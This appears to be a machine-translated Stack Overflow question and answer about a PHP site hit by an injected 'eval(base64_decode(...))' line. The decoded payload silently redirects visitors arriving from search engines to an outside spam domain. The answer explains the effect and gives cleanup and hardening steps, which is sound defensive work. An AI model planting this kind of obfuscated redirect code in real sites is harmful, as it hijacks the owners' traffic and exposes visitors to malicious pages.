eval(base64_decode hack

Pau*_*ulo -4 php base64 eval

我正在使用的后端页面似乎注入了行 - eval(base64_decode("CgplcnJvcl9yZXBvcnRpbmcoMCk7C ...

并且base64字符串解码为

error_reporting(0);
$nccv=headers_sent();
if (!$nccv){
  $referer=$_SERVER['HTTP_REFERER'];

  if (stristr($referer,"aol.com")
    or stristr($referer,"yahoo")
    or stristr($referer,"google")
    or stristr($referer,"bing")
    or stristr($referer,"ask.com")
    or stristr($referer,"msn")
    or stristr($referer,"live")
    or stristr($referer,"facebook")
  ) {
    if (!stristr($referer,"cache") or !stristr($referer,"inurl")) {
        header("Location: http://lovemypants.co.cc/");
        exit();
    }
  }
}
Run Code Online (Sandbox Code Playgroud)

很抱歉没问题.在撰写这个问题的时候,我对编程和SO都是一个菜鸟,想知道这段代码的含义以及它的影响是什么.

Lig*_*ica 6

如果您正在寻找风险分析,那么我可以告诉您,"黑客"只是将访问者重定向到lovemypants.co.cc实际访问,而不是从搜索引擎重定向.

取出破解,修改密码,在建立公共密钥认证,让您的服务器由某人谁知道他们在做什么担保,并获得建立定期备份 ... 现在.

(下次请实际写一个问题.)